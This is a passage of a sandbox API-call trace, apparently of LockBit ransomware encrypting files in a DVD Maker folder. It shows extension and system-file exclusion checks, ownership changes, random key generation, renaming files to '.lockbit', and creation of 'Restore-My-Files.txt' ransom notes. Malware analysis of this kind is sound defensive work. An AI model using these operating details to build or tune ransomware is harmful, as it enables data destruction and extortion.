[0084.998] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0084.998] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0084.998] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv.lockbit") returned 76 [0084.998] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.999] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.999] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.999] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.999] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.000] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.000] RtlFreeAnsiString (AnsiString="\\") [0085.000] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0085.000] malloc (_Size=0x200) returned 0x77d800 [0085.000] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.000] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.000] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.000] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.001] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.001] CloseHandle (hObject=0x3b4) returned 1 [0085.001] free (_Block=0x77d800) [0085.001] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0085.002] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.002] malloc (_Size=0x40068) returned 0x3d70048 [0085.002] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=933322) returned 1 [0085.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0085.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0085.003] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0085.008] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.008] malloc (_Size=0xae) returned 0x1ff1e60 [0085.008] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xae, FileInformationClass=0xa) returned 0x0 [0085.009] free (_Block=0x1ff1e60) [0085.009] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0085.009] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0085.009] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.009] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723bc1d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x723bc1d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf188a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_Page_Ref_PAL.wmv", cAlternateFileName="")) returned 1 [0085.009] lstrcmpiW (lpString1=".", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.009] lstrcmpiW (lpString1="..", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.009] PathFindExtensionW (pszPath="Title_Page_Ref_PAL.wmv") returned=".wmv" [0085.009] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0085.010] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0085.011] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0085.011] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0085.012] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0085.012] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0085.012] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0085.012] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0085.012] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0085.012] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0085.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.014] lstrcmpiW (lpString1="ntldr", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.014] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.014] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.015] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.015] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.015] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_Page_Ref_PAL.wmv") returned -1 [0085.015] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0085.015] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv") returned=".wmv" [0085.015] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0085.015] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0085.015] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0085.016] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0085.016] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv.lockbit") returned 80 [0085.016] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.025] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.025] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.025] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.026] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.027] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.027] RtlFreeAnsiString (AnsiString="\\") [0085.027] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0085.027] malloc (_Size=0x200) returned 0x77d800 [0085.027] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.027] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.027] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.027] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.028] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.031] CloseHandle (hObject=0x3b8) returned 1 [0085.031] free (_Block=0x77d800) [0085.031] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.031] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.031] malloc (_Size=0x40068) returned 0x3df0008 [0085.032] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=989322) returned 1 [0085.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0085.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0085.033] ReadFile (in: hFile=0x3b8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0085.038] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.038] malloc (_Size=0xb6) returned 0x1ff1e60 [0085.038] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0085.039] free (_Block=0x1ff1e60) [0085.040] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0085.040] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0085.040] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.040] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723bc1d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x723bc1d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf188a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_Page_Ref_PAL.wmv", cAlternateFileName="")) returned 0 [0085.040] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0085.040] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee00a15, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x4ee00a15, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x14fc, dwReserved0=0x520150, dwReserved1=0x0, cFileName="photoedge_buttongraphic.png", cAlternateFileName="")) returned 1 [0085.040] lstrcmpiW (lpString1=".", lpString2="photoedge_buttongraphic.png") returned -1 [0085.040] lstrcmpiW (lpString1="..", lpString2="photoedge_buttongraphic.png") returned -1 [0085.040] PathFindExtensionW (pszPath="photoedge_buttongraphic.png") returned=".png" [0085.040] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.040] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.040] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.040] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.041] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.041] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.041] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.041] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.042] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.042] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.042] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.042] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.042] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.042] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.042] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.043] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.043] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.043] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.043] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.043] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.043] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.043] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.043] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="photoedge_buttongraphic.png") returned 1 [0085.043] lstrcmpiW (lpString1="ntldr", lpString2="photoedge_buttongraphic.png") returned -1 [0085.043] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="photoedge_buttongraphic.png") returned -1 [0085.043] lstrcmpiW (lpString1="bootsect.bak", lpString2="photoedge_buttongraphic.png") returned -1 [0085.043] lstrcmpiW (lpString1="autorun.inf", lpString2="photoedge_buttongraphic.png") returned -1 [0085.043] lstrcmpiW (lpString1="thumbs.db", lpString2="photoedge_buttongraphic.png") returned 1 [0085.043] lstrcmpiW (lpString1="iconcache.db", lpString2="photoedge_buttongraphic.png") returned -1 [0085.043] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.043] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png") returned=".png" [0085.043] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.043] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.043] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.043] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.044] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.044] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.044] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.045] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.045] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.045] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.045] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.045] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 